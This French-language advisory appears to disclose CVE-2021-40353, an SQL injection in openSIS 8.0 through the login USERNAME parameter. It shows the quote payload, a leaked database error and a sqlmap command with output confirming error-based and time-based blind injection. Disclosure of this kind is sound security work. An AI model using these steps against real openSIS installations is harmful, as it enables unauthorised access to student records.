
Vulnérabilité d'injection SQL CVE-2021-40353 openSIS 8.0
CVE-2021-40353 Vulnérabilité d'injection SQL dans openSIS 8.0 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40353
Une vulnérabilité d'injection SQL existe dans la version 8.0 d'openSIS lorsque MySQL ou MariaDB est utilisé comme base de données de l'application. Un attaquant peut alors émettre la commande SQL via le paramètre USERNAME.
Page PHP vulnérable :
index.php - paramètre USERNAME
Charge utile vulnérable ' - produira une erreur avec les informations de la base de données " - ne produit pas l'erreur
Erreur
Date :
08/31/2021 03:16:22
Avis d'échec :
DB Execute Failed
SQL : UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER('user1'') Traceback : C:\xampp\htdocs\opensis\index.php at 502 Informations supplémentaires : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''user1'')' at line 1 Date :
08/31/2021 03:16:22
openSIS a rencontré une erreur qui pourrait résulter de l'une des causes suivantes :
Entrée de données invalide
Erreur SQL de base de données
Erreur de programme
Veuillez prendre cette capture d'écran et l'envoyer à votre représentant openSIS pour débogage et résolution.
sqlmap -r post_opensis -p USERNAME
[09:38:19] [INFO] POST parameter 'USERNAME' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable [09:38:19] [INFO] testing 'MySQL inline queries' [09:38:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)' [09:38:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries' [09:38:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)' [09:38:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)' [09:38:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)' [09:38:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [09:38:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [09:38:46] [INFO] POST parameter 'USERNAME' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Découvert par Brian Lowe, août 2021